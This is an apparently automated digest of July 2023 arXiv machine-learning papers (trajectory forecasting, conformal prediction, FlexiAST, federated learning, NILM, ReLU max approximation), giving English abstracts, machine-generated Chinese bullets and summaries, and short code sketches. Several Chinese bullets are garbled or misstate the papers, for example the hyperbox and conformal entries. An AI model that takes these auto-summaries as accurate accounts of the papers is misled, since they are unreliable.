    摘要 我们提出了一种神经求解器以及量子透射边界模型的可微模拟,用于求解量子输运反问题。其中,神经求解器用于设计连续的透射特性,而可微模拟用于设计电流-电压特性。

EigenTrajectory: Low-Rank Descriptors for Multi-Modal Trajectory Forecasting

  • paper_url: http://arxiv.org/abs/2307.09306
  • repo_url: https://github.com/inhwanbae/eigentrajectory
  • paper_authors: Inhwan Bae, Jean Oh, Hae-Gon Jeon
  • For: 本研究旨在提高行人轨迹预测的精度和可靠性,通过使用新的轨迹描述符来降低轨迹表示的维度。
  • Methods: 我们使用一种新的轨迹描述符,将行人轨迹变换到一个紧凑的 $\mathbb{ET}$ 空间,再交由现成的轨迹预测模型进行预测。此外,我们还提出了一种基于轨迹锚点的精修方法,以覆盖所有可能的未来。
  • Results: 实验结果表明,EigenTrajectory 预测器可以显著提高现有轨迹预测模型在公开基准上的预测精度和可靠性,说明所提描述符适合表示行人行为。代码可以在 https://github.com/inhwanbae/EigenTrajectory 下载。
    Abstract Capturing high-dimensional social interactions and feasible futures is essential for predicting trajectories. To address this complex nature, several attempts have been devoted to reducing the dimensionality of the output variables via parametric curve fitting such as the B\'ezier curve and B-spline function. However, these functions, which originate in computer graphics fields, are not suitable to account for socially acceptable human dynamics. In this paper, we present EigenTrajectory ($\mathbb{ET}$), a trajectory prediction approach that uses a novel trajectory descriptor to form a compact space, known here as $\mathbb{ET}$ space, in place of Euclidean space, for representing pedestrian movements. We first reduce the complexity of the trajectory descriptor via a low-rank approximation. We transform the pedestrians' history paths into our $\mathbb{ET}$ space represented by spatio-temporal principle components, and feed them into off-the-shelf trajectory forecasting models. The inputs and outputs of the models as well as social interactions are all gathered and aggregated in the corresponding $\mathbb{ET}$ space. Lastly, we propose a trajectory anchor-based refinement method to cover all possible futures in the proposed $\mathbb{ET}$ space. Extensive experiments demonstrate that our EigenTrajectory predictor can significantly improve both the prediction accuracy and reliability of existing trajectory forecasting models on public benchmarks, indicating that the proposed descriptor is suited to represent pedestrian behaviors. Code is publicly available at https://github.com/inhwanbae/EigenTrajectory .
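A toy sketch of the low-rank descriptor idea follows (a truncated SVD of flattened trajectories standing in for the $\mathbb{ET}$-space construction; the paper's full pipeline, anchors, and forecaster are not reproduced here):

```python
# Represent trajectories by their leading spatio-temporal principal components.
import numpy as np

rng = np.random.default_rng(0)
trajs = rng.normal(size=(1000, 12, 2))        # (pedestrians, timesteps, xy); stand-in data
flat = trajs.reshape(len(trajs), -1)
mean = flat.mean(axis=0, keepdims=True)

_, _, Vt = np.linalg.svd(flat - mean, full_matrices=False)
k = 6                                         # descriptor dimension (low rank)
basis = Vt[:k]                                # spatio-temporal principal components
coeffs = (flat - mean) @ basis.T              # compact per-trajectory descriptors
recon = coeffs @ basis + mean                 # map descriptors back to trajectory space
print(coeffs.shape, "reconstruction MAE:", float(np.abs(recon - flat).mean()))
```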

Conformal prediction under ambiguous ground truth

  • paper_url: http://arxiv.org/abs/2307.09302
  • repo_url: None
  • paper_authors: David Stutz, Abhijit Guha Roy, Tatiana Matejovicova, Patricia Strachan, Ali Taylan Cemgil, Arnaud Doucet
  • for: 这个论文的目的是提出一种基于不确定标签的整形预测方法,以便在不具备准确标签的情况下进行不确定性评估。
  • methods: 该方法基于一种approximentation of the underlying posterior distribution of labels given inputs,以便处理不具备准确标签的情况。
  • results: 在synthetic和实际 dataset上,该方法可以准确地预测输入样本的标签,并且可以正确地评估输入样本的不确定性。在一个dermatology例子中,该方法可以成功地预测皮肤状况的标签。
    Abstract In safety-critical classification tasks, conformal prediction allows to perform rigorous uncertainty quantification by providing confidence sets including the true class with a user-specified probability. This generally assumes the availability of a held-out calibration set with access to ground truth labels. Unfortunately, in many domains, such labels are difficult to obtain and usually approximated by aggregating expert opinions. In fact, this holds true for almost all datasets, including well-known ones such as CIFAR and ImageNet. Applying conformal prediction using such labels underestimates uncertainty. Indeed, when expert opinions are not resolvable, there is inherent ambiguity present in the labels. That is, we do not have ``crisp'', definitive ground truth labels and this uncertainty should be taken into account during calibration. In this paper, we develop a conformal prediction framework for such ambiguous ground truth settings which relies on an approximation of the underlying posterior distribution of labels given inputs. We demonstrate our methodology on synthetic and real datasets, including a case study of skin condition classification in dermatology.
    摘要 在安全关键的分类任务中,保形预测可以通过给出以用户指定概率包含真实类别的置信集,来进行严格的不确定性量化。这通常假设存在一个可以获得真实标签的保留校准集。然而,在许多领域,这类标签很难获得,通常只能通过汇总专家意见来近似;事实上,几乎所有数据集(包括著名的 CIFAR 和 ImageNet)都是如此。在这类标签上直接应用保形预测会低估不确定性。实际上,当专家意见无法达成一致时,标签本身就带有固有的歧义:我们并没有"清晰"、确定的真实标签,这种不确定性应当在校准阶段被考虑进来。在这篇论文中,我们为这种真实标签存在歧义的情形开发了一个保形预测框架,其依赖于对给定输入下标签后验分布的近似。我们在合成与真实数据集上验证了该方法,包括皮肤科中皮肤状况分类的案例研究。
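For reference, the standard split conformal baseline on top of softmax scores looks like the sketch below; the paper's contribution, calibrating against an approximate posterior over ambiguous labels instead of crisp labels, is not shown.

```python
# Baseline split conformal prediction sets from held-out calibration data.
import numpy as np

def conformal_sets(cal_probs, cal_labels, test_probs, alpha=0.1):
    n = len(cal_labels)
    scores = 1.0 - cal_probs[np.arange(n), cal_labels]            # nonconformity of true labels
    level = np.ceil((n + 1) * (1 - alpha)) / n
    q = np.quantile(scores, level, method="higher")               # conformal quantile
    return test_probs >= 1.0 - q                                  # mask: label included in set

rng = np.random.default_rng(0)
cal_probs = rng.dirichlet(np.ones(5), size=200)
cal_labels = rng.integers(0, 5, size=200)
test_probs = rng.dirichlet(np.ones(5), size=3)
print(conformal_sets(cal_probs, cal_labels, test_probs).astype(int))
```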

FlexiAST: Flexibility is What AST Needs

  • paper_url: http://arxiv.org/abs/2307.09286
  • repo_url: https://github.com/JiuFengSC/FlexiAST_INTERSPEECH23
  • paper_authors: Jiu Feng, Mehmet Hamza Erol, Joon Son Chung, Arda Senocak
  • for: 提高Audio Spectrogram Transformer(AST)模型在不同补丁大小下的性能。
  • methods: 提出一种基于随机补丁大小选择和补丁重量resize的训练方法,使标准AST模型在推理阶段能够适应不同补丁大小。
  • results: 实验表明,FlexiAST模型在不同补丁大小下保持类似的性能,而无需进行architecture变更。
    Abstract The objective of this work is to give patch-size flexibility to Audio Spectrogram Transformers (AST). Recent advancements in ASTs have shown superior performance in various audio-based tasks. However, the performance of standard ASTs degrades drastically when evaluated using different patch sizes from that used during training. As a result, AST models are typically re-trained to accommodate changes in patch sizes. To overcome this limitation, this paper proposes a training procedure to provide flexibility to standard AST models without architectural changes, allowing them to work with various patch sizes at the inference stage - FlexiAST. This proposed training approach simply utilizes random patch size selection and resizing of patch and positional embedding weights. Our experiments show that FlexiAST gives similar performance to standard AST models while maintaining its evaluation ability at various patch sizes on different datasets for audio classification tasks.
    摘要 这项工作的目标是让音频频谱图 Transformer(AST)具备补丁(patch)大小的灵活性。AST 的最新进展已在各类音频任务中展现出优异表现;然而,当评估所用的补丁大小与训练时不同时,标准 AST 的性能会急剧下降,因而通常需要重新训练模型以适应补丁大小的变化。为克服这一限制,本文提出了一种无需改动网络结构的训练方法 FlexiAST,使标准 AST 模型在推理阶段能够适应各种补丁大小。该方法只需在训练中随机选择补丁大小,并对补丁嵌入和位置嵌入权重进行尺寸调整。实验表明,FlexiAST 在多个音频分类数据集上保持了与标准 AST 相当的性能,同时能够在不同补丁大小下进行评估。
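The enabling trick, resizing the patch-embedding (and positional-embedding) weights so one checkpoint can serve several patch sizes, can be sketched as below; FlexiAST's actual training recipe randomizes the patch size per step, and its resize operator may differ from plain bilinear interpolation.

```python
# Illustration: resize a ViT/AST patch-embedding kernel to a new patch size at inference.
import torch
import torch.nn.functional as F

def resize_patch_embed(weight: torch.Tensor, new_patch: int) -> torch.Tensor:
    # weight: (embed_dim, in_chans, old_patch, old_patch) conv kernel of the patch embedding
    return F.interpolate(weight, size=(new_patch, new_patch), mode="bilinear", align_corners=False)

old = torch.randn(768, 1, 16, 16)   # e.g. an AST patch embedding trained with 16x16 patches
new = resize_patch_embed(old, 8)    # reuse the same checkpoint with 8x8 patches
print(old.shape, "->", new.shape)   # positional embeddings would be interpolated analogously
```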

End-to-End Neural Network Training for Hyperbox-Based Classification

  • paper_url: http://arxiv.org/abs/2307.09269
  • repo_url: https://github.com/mlde-ms/hypernn
  • paper_authors: Denis Mayr Lima Martins, Christian Lülf, Fabian Gieseke
  • for: 这篇论文是为了提出一个新的、可微分的核心框架,以便实现高效地对大量数据进行分类。
  • methods: 这篇论文使用了神经网络,并将核心框架转换为可微分的形式,以便实现更高效的训练。
  • results: 这篇论文的结果显示,使用这个新的核心框架和训练方法可以获得更好的分类结果,并且训练时间更短。
    Abstract Hyperbox-based classification has been seen as a promising technique in which decisions on the data are represented as a series of orthogonal, multidimensional boxes (i.e., hyperboxes) that are often interpretable and human-readable. However, existing methods are no longer capable of efficiently handling the increasing volume of data many application domains face nowadays. We address this gap by proposing a novel, fully differentiable framework for hyperbox-based classification via neural networks. In contrast to previous work, our hyperbox models can be efficiently trained in an end-to-end fashion, which leads to significantly reduced training times and superior classification results.
    摘要 基于超盒(hyperbox)的分类被视为一种有前途的技术:对数据的决策由一系列正交的多维盒子(即超盒)表示,这些盒子通常具有可解释性且便于人工阅读。然而,现有方法已难以高效处理当今许多应用领域不断增长的数据量。为弥补这一不足,我们提出了一个基于神经网络、完全可微的超盒分类框架。与以往工作不同,我们的超盒模型可以端到端地高效训练,从而显著缩短训练时间并取得更优的分类结果。
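One way to make hyperboxes differentiable is to replace hard box membership with a smooth surrogate, as in the illustrative sketch below; this shows the general idea, not the paper's exact parameterization or loss.

```python
# Soft (differentiable) hyperbox memberships feeding a linear classifier head.
import torch
from torch import nn
import torch.nn.functional as F

class SoftHyperboxClassifier(nn.Module):
    def __init__(self, in_dim: int, num_boxes: int, num_classes: int, beta: float = 10.0):
        super().__init__()
        self.low = nn.Parameter(torch.rand(num_boxes, in_dim))      # lower corners
        self.size = nn.Parameter(torch.rand(num_boxes, in_dim))     # box extents (via softplus)
        self.cls = nn.Linear(num_boxes, num_classes)
        self.beta = beta

    def forward(self, x):
        high = self.low + F.softplus(self.size)
        # ~1 inside a box, smoothly decaying outside; product over dimensions
        inside = torch.sigmoid(self.beta * (x.unsqueeze(1) - self.low)) * \
                 torch.sigmoid(self.beta * (high - x.unsqueeze(1)))
        membership = inside.prod(dim=-1)                             # (batch, num_boxes)
        return self.cls(membership)                                  # class logits

model = SoftHyperboxClassifier(in_dim=2, num_boxes=8, num_classes=3)
print(model(torch.randn(5, 2)).shape)  # torch.Size([5, 3])
```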

Mobility-Aware Joint User Scheduling and Resource Allocation for Low Latency Federated Learning

  • paper_url: http://arxiv.org/abs/2307.09263
  • repo_url: None
  • paper_authors: Kecheng Fan, Wen Chen, Jun Li, Xiumei Deng, Xuefeng Han, Ming Ding
  • for: 这个论文的目的是提出一个实用的机器学习方法,以解决在联盟学习(Federated Learning,FL)中用户移动导致训练效能下降的问题。
  • methods: 这个论文使用了一个实际的用户移动模型,并提出了一个用户排程和资源分配方法,以减少训练延迟时间,并且考虑了对于用户移动的影响。
  • results: Simulation results show that the proposed algorithm achieves better performance than the state-of-the-art baselines, and that a certain level of user mobility can improve training performance.
    Abstract As an efficient distributed machine learning approach, Federated learning (FL) can obtain a shared model by iterative local model training at the user side and global model aggregating at the central server side, thereby protecting privacy of users. Mobile users in FL systems typically communicate with base stations (BSs) via wireless channels, where training performance could be degraded due to unreliable access caused by user mobility. However, existing work only investigates a static scenario or random initialization of user locations, which fail to capture mobility in real-world networks. To tackle this issue, we propose a practical model for user mobility in FL across multiple BSs, and develop a user scheduling and resource allocation method to minimize the training delay with constrained communication resources. Specifically, we first formulate an optimization problem with user mobility that jointly considers user selection, BS assignment to users, and bandwidth allocation to minimize the latency in each communication round. This optimization problem turned out to be NP-hard and we proposed a delay-aware greedy search algorithm (DAGSA) to solve it. Simulation results show that the proposed algorithm achieves better performance than the state-of-the-art baselines and a certain level of user mobility could improve training performance.
    摘要 为了实现高效的分布式机器学习方法,联邦学习(FL)可以在用户端进行轮循式地本地模型训练和中央服务器端进行全球模型汇总,以保护用户隐私。在FL系统中,移动用户通常通过无线通信通道与基站(BS)进行交互,但是训练性能可能受到用户移动导致的不可预测访问所增加的干扰。现有研究仅考虑静止场景或随机初始化用户位置,未能捕捉实际网络中的移动。为解决这个问题,我们提出了实际的用户移动模型在FL中,并开发了一种用户调度和资源分配方法,以最小化通信资源的培训延迟。具体来说,我们首先将用户移动引入到联邦学习中的优化问题中,并jointly考虑用户选择、用户分配到BS以及带宽分配,以最小化每次通信圈中的延迟。这个优化问题被证明是NP困难的,我们提出了延迟意识搜索算法(DAGSA)解决它。实验结果表明,我们的算法在比较状态前的基elines上表现得更好,并且一定程度的用户移动可以提高训练性能。

Adaptive Topological Feature via Persistent Homology: Filtration Learning for Point Clouds

  • paper_url: http://arxiv.org/abs/2307.09259
  • repo_url: None
  • paper_authors: Naoki Nishikawa, Yuichi Ike, Kenji Yamanishi
  • for: 提高机器学习点云处理精度,应用于形态识别和材料科学等领域。
  • methods: 使用神经网络学习自适应滤波,以保证 persistent homology 的同质性。
  • results: 在多个分类任务中表现出色,证明了我们框架的有效性。
    Abstract Machine learning for point clouds has been attracting much attention, with many applications in various fields, such as shape recognition and material science. To enhance the accuracy of such machine learning methods, it is known to be effective to incorporate global topological features, which are typically extracted by persistent homology. In the calculation of persistent homology for a point cloud, we need to choose a filtration for the point clouds, an increasing sequence of spaces. Because the performance of machine learning methods combined with persistent homology is highly affected by the choice of a filtration, we need to tune it depending on data and tasks. In this paper, we propose a framework that learns a filtration adaptively with the use of neural networks. In order to make the resulting persistent homology isometry-invariant, we develop a neural network architecture with such invariance. Additionally, we theoretically show a finite-dimensional approximation result that justifies our architecture. Experimental results demonstrated the efficacy of our framework in several classification tasks.
    摘要 面向点云的机器学习近来受到广泛关注,在形状识别、材料科学等多个领域有重要应用。为提高此类机器学习方法的精度,引入全局拓扑特征被证明是有效的,这类特征通常通过持续同调(persistent homology)提取。在计算点云的持续同调时,需要为点云选择一个过滤(filtration),即一个递增的空间序列。由于与持续同调结合的机器学习方法的性能在很大程度上取决于过滤的选择,因此需要针对不同的数据和任务进行调整。在这篇论文中,我们提出了一个利用神经网络自适应学习过滤的框架。为使所得的持续同调具有等距不变性,我们设计了具备该不变性的神经网络结构,并从理论上给出了一个有限维逼近结果来支撑该结构。实验结果表明,我们的框架在多个分类任务中表现出色,证明了其有效性。

PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models

  • paper_url: http://arxiv.org/abs/2307.09254
  • repo_url: None
  • paper_authors: Sangdon Park, Taesoo Kim
  • for: 提高模型的可靠性和信任worthiness
  • methods: 使用神经网络 parameterized prediction set models,实现更精准的uncertainty quantification,并且满足 probably approximately correct (PAC) 保证
  • results: 在四种语言数据集和六种模型上,比基准方法提高quantified uncertainty的精度$63%$的平均值
    Abstract Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to the concerns on generating hallucinated facts. In this paper, we propose to learn neural prediction set models that comes with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.
    摘要 模型的不确定性学习与量化是提高模型可信度的关键任务。尤其是近年来生成语言模型(GLM)的兴起,使可靠的不确定性量化变得更加重要,因为人们担心此类模型会生成虚构事实。在这篇论文中,我们提出学习带有"大概率近似正确"(PAC)保证的神经预测集模型,用于量化 GLM 的不确定性。与现有用单个标量参数化的预测集模型不同,我们用神经网络来参数化预测集,从而获得更精细的不确定性量化,同时仍满足 PAC 保证。我们在四类语言数据集和六类模型上验证了该方法:与标准基线方法相比,其量化的不确定性平均改进了 63%。
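For orientation, the scalar-threshold PAC prediction-set baseline (the construction the paper generalizes by replacing the scalar with a neural parameterization) can be sketched as follows; the calibration scores here are synthetic stand-ins.

```python
# Scalar PAC prediction sets: choose the largest threshold whose Clopper-Pearson upper
# bound on miscoverage stays below epsilon, with failure probability at most delta.
import numpy as np
from scipy import stats

def pac_threshold(cal_true_scores, eps=0.1, delta=0.05):
    n = len(cal_true_scores)
    best = 0.0
    for tau in np.sort(cal_true_scores):
        k = int((cal_true_scores < tau).sum())          # calibration errors at this threshold
        upper = stats.beta.ppf(1 - delta, k + 1, n - k) # Clopper-Pearson upper confidence bound
        if upper <= eps:
            best = tau                                  # larger tau -> smaller sets, still PAC
    return best

scores = np.random.default_rng(0).beta(5, 2, size=500) # stand-in scores of the true labels
tau = pac_threshold(scores)
print("prediction set = {y : score(x, y) >= %.3f}" % tau)
```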

UniTabE: Pretraining a Unified Tabular Encoder for Heterogeneous Tabular Data

  • paper_url: http://arxiv.org/abs/2307.09249
  • repo_url: None
  • paper_authors: Yazheng Yang, Yuqi Wang, Guang Liu, Ledell Wu, Qi Liu
  • for: 本研究旨在推广自然语言处理(NLP)中的预训练方法,应用于表格数据,以提高表格数据分析的Semantic Representation。
  • methods: 本研究使用了UniTabE方法,该方法基于表格元素模块(TabUnit)和Transformer编码器,可以适应不同的表格结构。此外,模型还支持预训练和Finetuning,通过自由形式的提示。
  • results: 实验结果显示,UniTabE方法在多个benchmark dataset上表现出色,超过了多个基eline模型。这说明UniTabE方法可以有效地提高表格数据的Semantic Representation,为表格数据分析带来 significiant progress.
    Abstract Recent advancements in Natural Language Processing (NLP) have witnessed the groundbreaking impact of pretrained models, yielding impressive outcomes across various tasks. This study seeks to extend the power of pretraining methodologies to tabular data, a domain traditionally overlooked, yet inherently challenging due to the plethora of table schemas intrinsic to different tasks. The primary research questions underpinning this work revolve around the adaptation to heterogeneous table structures, the establishment of a universal pretraining protocol for tabular data, the generalizability and transferability of learned knowledge across tasks, the adaptation to diverse downstream applications, and the incorporation of incremental columns over time. In response to these challenges, we introduce UniTabE, a pioneering method designed to process tables in a uniform manner, devoid of constraints imposed by specific table structures. UniTabE's core concept relies on representing each basic table element with a module, termed TabUnit. This is subsequently followed by a Transformer encoder to refine the representation. Moreover, our model is designed to facilitate pretraining and finetuning through the utilization of free-form prompts. In order to implement the pretraining phase, we curated an expansive tabular dataset comprising approximately 13 billion samples, meticulously gathered from the Kaggle platform. Rigorous experimental testing and analyses were performed under a myriad of scenarios to validate the effectiveness of our methodology. The experimental results demonstrate UniTabE's superior performance against several baseline models across a multitude of benchmark datasets. This, therefore, underscores UniTabE's potential to significantly enhance the semantic representation of tabular data, thereby marking a significant stride in the field of tabular data analysis.
    摘要 近年的自然语言处理(NLP)技术发展,启示出革命性的影响,在多种任务上取得了卓越的成绩。这项研究旨在扩展预训练方法的应用范围,推广到表格数据领域,这是传统上受过忽略的领域,但具有各种表格结构的强大挑战。本研究的主要问题包括适应不同表格结构、建立通用预训练协议、学习知识的通用性和跨任务传递性、适应多种下游应用、以及逐渐增加的列的支持。为解决这些挑战,我们提出了UniTabE方法,用于统一处理表格数据,不受特定表格结构的限制。UniTabE的核心思想是将每个基本表格元素表示为Module,称为TabUnit,然后使用Transformer编码器进行细化表示。此外,我们的模型设计能够方便预训练和finetuning,通过使用自由形式的提示。为进行预训练阶段,我们精心收集了约130亿个样本的大量表格数据,从Kaggle平台上精心收集。通过多种情况下的严格实验和分析,我们证明UniTabE方法在多个benchmark数据集上的表现优于多个基eline模型。这一结果 therefore表明UniTabE具有提高表格数据semantic表示的潜在能力,从而为表格数据分析带来重要的进步。

Application of BERT in Wind Power Forecasting-Teletraan’s Solution in Baidu KDD Cup 2022

  • paper_url: http://arxiv.org/abs/2307.09248
  • repo_url: https://github.com/longxingtan/kdd2022-baidu
  • paper_authors: Longxing Tan, Hongying Yue
  • for: 预测风力电力系统的可靠性和可持续发展
  • methods: 使用BERT模型和日均异常值补做来预测风力电力系统的输出
  • results: 在 Baidu KDD Cup 2022 中获得第三名(共 2490 支队伍),体现了该方法的有效性和精度。
    Abstract Nowadays, wind energy has drawn increasing attention as its important role in carbon neutrality and sustainable development. When wind power is integrated into the power grid, precise forecasting is necessary for the sustainability and security of the system. However, the unpredictable nature and long sequence prediction make it especially challenging. In this technical report, we introduce the BERT model applied for Baidu KDD Cup 2022, and the daily fluctuation is added by post-processing to make the predicted results in line with daily periodicity. Our solution achieves 3rd place of 2490 teams. The code is released athttps://github.com/LongxingTan/KDD2022-Baidu
    摘要 现在,风能资源已经吸引了越来越多的关注,因为它在碳中和可持续发展中扮演着重要的角色。当风力发电机与电力网络集成时,准确预测成为了系统可持续性和安全性的重要因素。然而,风力预测具有不可预测性和长时间序列预测的特点,使得预测变得特别困难。在这份技术报告中,我们介绍了BERT模型在Baidu KDD杯2022中的应用,并通过后处理来添加日律性,使预测结果与日律性保持一致。我们的解决方案在2490个团队中获得第三名,代码在https://github.com/LongxingTan/KDD2022-Baidu上发布。

Towards Sustainable Deep Learning for Multi-Label Classification on NILM

  • paper_url: http://arxiv.org/abs/2307.09244
  • repo_url: None
  • paper_authors: Anže Pirnat, Blaž Bertalanič, Gregor Cerar, Mihael Mohorčič, Carolina Fortuna
  • for: 本文旨在提高用于非侵入式负荷监测(NILM)多标签分类的深度学习模型的计算与能源效率。
  • methods: 本文提出了一种新的深度学习模型,用于增强 NILM 的多标签分类,并降低训练与运行阶段的计算和能源需求。
  • results: 在由 REFIT 和 UK-DALE 数据集合成的数据上测试,所提模型相比最新方法平均提升约 8 个百分点的性能,同时将碳足迹降低 23% 以上。
    Abstract Non-intrusive load monitoring (NILM) is the process of obtaining appliance-level data from a single metering point, measuring total electricity consumption of a household or a business. Appliance-level data can be directly used for demand response applications and energy management systems as well as for awareness raising and motivation for improvements in energy efficiency and reduction in the carbon footprint. Recently, classical machine learning and deep learning (DL) techniques became very popular and proved as highly effective for NILM classification, but with the growing complexity these methods are faced with significant computational and energy demands during both their training and operation. In this paper, we introduce a novel DL model aimed at enhanced multi-label classification of NILM with improved computation and energy efficiency. We also propose a testing methodology for comparison of different models using data synthesized from the measurement datasets so as to better represent real-world scenarios. Compared to the state-of-the-art, the proposed model has its carbon footprint reduced by more than 23% while providing on average approximately 8 percentage points in performance improvement when testing on data derived from REFIT and UK-DALE datasets.
    摘要 非侵入式负荷监测(NILM)是指在单个计量点测量住宅或企业的总用电量,并由此获得电器级别的用电数据。电器级别的数据既可直接用于需求响应应用和能源管理系统,也可用于提升节能意识,激励改进能源效率、减少碳足迹。近年来,经典机器学习与深度学习(DL)技术在 NILM 分类中非常流行并被证明十分有效,但随着模型复杂度的提高,这些方法在训练和运行阶段都面临着可观的计算与能源开销。在本文中,我们提出了一种新的深度学习模型,旨在以更高的计算与能源效率增强 NILM 的多标签分类。我们还提出了一种利用测量数据集合成数据进行模型比较的测试方法,以更贴近真实场景。与最新方法相比,所提模型的碳足迹降低了 23% 以上,同时在由 REFIT 和 UK-DALE 数据集派生的数据上测试时平均提升约 8 个百分点的性能。

Fusing Hand and Body Skeletons for Human Action Recognition in Assembly

  • paper_url: http://arxiv.org/abs/2307.09238
  • repo_url: None
  • paper_authors: Dustin Aganian, Mona Köhler, Benedict Stephan, Markus Eisenbach, Horst-Michael Gross
  • for: 这篇论文主要是为了提高人机合作的效果,使用机器人在制造过程中协助人类完成Assembly任务。
  • methods: 该方法使用较为简单的人体骨架,并与高级别的手套骨架结合,使用CNN和转换器来提高人体动作识别率。
  • results: 该方法在Assembly场景中的人体动作识别率得到了提高,可以帮助机器人更好地协助人类完成Assembly任务。
    Abstract As collaborative robots (cobots) continue to gain popularity in industrial manufacturing, effective human-robot collaboration becomes crucial. Cobots should be able to recognize human actions to assist with assembly tasks and act autonomously. To achieve this, skeleton-based approaches are often used due to their ability to generalize across various people and environments. Although body skeleton approaches are widely used for action recognition, they may not be accurate enough for assembly actions where the worker's fingers and hands play a significant role. To address this limitation, we propose a method in which less detailed body skeletons are combined with highly detailed hand skeletons. We investigate CNNs and transformers, the latter of which are particularly adept at extracting and combining important information from both skeleton types using attention. This paper demonstrates the effectiveness of our proposed approach in enhancing action recognition in assembly scenarios.
    摘要 随着协同机器人(COBOT)在工业生产领域的普及,人机合作的效果变得越来越重要。COBOT应该能够认识人类动作,协助Assembly任务,并且可以自动行动。为达到这个目标,skeleton-based方法经常用于人机合作,因为它们可以在不同的人和环境中广泛普适。虽然body skeleton方法广泛用于动作识别,但它们可能无法准确地识别Assembly动作,这是因为工人的手指和手臂在这些动作中扮演着重要的角色。为解决这个限制,我们提议一种方法,即将较为简单的body skeleton与高级细节的手skeleton结合在一起。我们 investigate CNNs和transformers,后者尤其适合从skeleton类型中提取和组合重要信息,使用注意力。本文证明我们提议的方法可以在Assembly场景中提高动作识别的效果。

Detecting Throat Cancer from Speech Signals Using Machine Learning: A Reproducible Literature Review

  • paper_url: http://arxiv.org/abs/2307.09230
  • repo_url: None
  • paper_authors: Mary Paterson, James Moor, Luisa Cutillo
  • for: 这个研究是对现有文献中的嗓腔癌检测使用机器学习和人工智能的论文进行探讨。
  • methods: 这些论文使用的方法包括神经网络,并且大多数使用神经网络进行实现。Audio中的多种特征被提取,mel-frequency cepstral coefficients最常用。
  • results: 我们使用迁移学习进行多分类(三种病理与健康对照),取得了 53.54% 的无加权平均召回率、83.14% 的敏感度和 64.00% 的特异度;我们的分类器与同一数据集上已有结果相当。
    Abstract In this work we perform a scoping review of the current literature on the detection of throat cancer from speech recordings using machine learning and artificial intelligence. We find 22 papers within this area and discuss their methods and results. We split these papers into two groups - nine performing binary classification, and 13 performing multi-class classification. The papers present a range of methods with neural networks being most commonly implemented. Many features are also extracted from the audio before classification, with the most common bring mel-frequency cepstral coefficients. None of the papers found in this search have associated code repositories and as such are not reproducible. Therefore, we create a publicly available code repository of our own classifiers. We use transfer learning on a multi-class problem, classifying three pathologies and healthy controls. Using this technique we achieve an unweighted average recall of 53.54%, sensitivity of 83.14%, and specificity of 64.00%. We compare our classifiers with the results obtained on the same dataset and find similar results.
    摘要 在这项工作中,我们对现有文献中利用机器学习和人工智能从语音信号检测喉癌的研究进行了范围综述。我们共找到 22 篇相关文献,并讨论了它们的方法与结果。这些文献可分为两组:9 篇进行二分类,13 篇进行多分类。文献中采用的方法多种多样,其中神经网络最为常用;多数工作在分类前会从音频中提取多种特征,最常用的是梅尔频率倒谱系数(MFCC)。我们发现检索到的文献均未附带代码仓库,因此无法复现。为此,我们自行构建并公开了一个分类器代码库。我们采用迁移学习解决一个多分类问题,区分三种病理与健康对照。借助该技术,我们取得了 53.54% 的无加权平均召回率、83.14% 的敏感度和 64.00% 的特异度。与同一数据集上已有结果相比,我们的分类器表现相当。

How Many Neurons Does it Take to Approximate the Maximum?

  • paper_url: http://arxiv.org/abs/2307.09212
  • repo_url: None
  • paper_authors: Itay Safran, Daniel Reichman, Paul Valiant
  • for: 本研究旨在探讨一个神经网络可以近似最大函数的大小,在最基本的近似情况下,即使用$L_2$范数,对于连续分布,并使用ReLU激活函数。
  • methods: 我们提供了新的下界和上界,以评估不同深度的神经网络所需的宽度,以及一个depth $\mathcal{O}(\log(\log(d)))$和宽度 $\mathcal{O}(d)$的建构,可以高效地近似最大函数。
  • results: 我们的结果显示,在depth 2和depth 3网络之间存在新的深度分离,以及depth 3和depth 5网络之间的深度分离。此外,我们还提供了一个depth $\mathcal{O}(\log(\log(d)))$和宽度 $\mathcal{O}(d)$的建构,可以高效地近似最大函数,远远超过了最好已知的深度 bound。
    Abstract We study the size of a neural network needed to approximate the maximum function over $d$ inputs, in the most basic setting of approximating with respect to the $L_2$ norm, for continuous distributions, for a network that uses ReLU activations. We provide new lower and upper bounds on the width required for approximation across various depths. Our results establish new depth separations between depth 2 and 3, and depth 3 and 5 networks, as well as providing a depth $\mathcal{O}(\log(\log(d)))$ and width $\mathcal{O}(d)$ construction which approximates the maximum function, significantly improving upon the depth requirements of the best previously known bounds for networks with linearly-bounded width. Our depth separation results are facilitated by a new lower bound for depth 2 networks approximating the maximum function over the uniform distribution, assuming an exponential upper bound on the size of the weights. Furthermore, we are able to use this depth 2 lower bound to provide tight bounds on the number of neurons needed to approximate the maximum by a depth 3 network. Our lower bounds are of potentially broad interest as they apply to the widely studied and used \emph{max} function, in contrast to many previous results that base their bounds on specially constructed or pathological functions and distributions.
    摘要 我们研究神经网络近似 $d$ 个输入的最大值函数所需的网络规模,考虑最基本的设定:在连续分布下以 $L_2$ 范数衡量近似误差,且网络使用 ReLU 激活函数。我们针对不同深度给出了近似所需宽度的新下界与上界。这些结果建立了新的深度分离:深度 2 与深度 3 之间,以及深度 3 与深度 5 之间。此外,我们还给出了一个深度为 $\mathcal{O}(\log(\log(d)))$、宽度为 $\mathcal{O}(d)$ 的构造来近似最大值函数,显著改进了此前已知的、宽度线性受限网络所需的深度上界。我们的深度分离结果依赖于一个新的下界:在权重大小具有指数上界的假设下,深度 2 网络在均匀分布上近似最大值函数所需的宽度。进一步地,利用这一深度 2 下界,我们给出了深度 3 网络近似最大值函数所需神经元数量的紧致界。我们的下界具有潜在的广泛意义,因为它们针对的是被广泛研究和使用的 max 函数,而许多先前结果则依赖于特殊构造的或病态的函数与分布。
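As a concrete reference point for the constructions discussed, the classical pairwise-reduction network computes the exact maximum with ReLUs via $\max(a,b) = a + \mathrm{relu}(b-a)$ and has depth $\mathcal{O}(\log d)$; the paper's $\mathcal{O}(\log\log d)$-depth construction is a different, more involved design not shown here.

```python
# Exact max of d inputs via the textbook pairwise ReLU reduction (depth O(log d)).
import numpy as np

def relu(x):
    return np.maximum(x, 0.0)

def pairwise_max(a, b):
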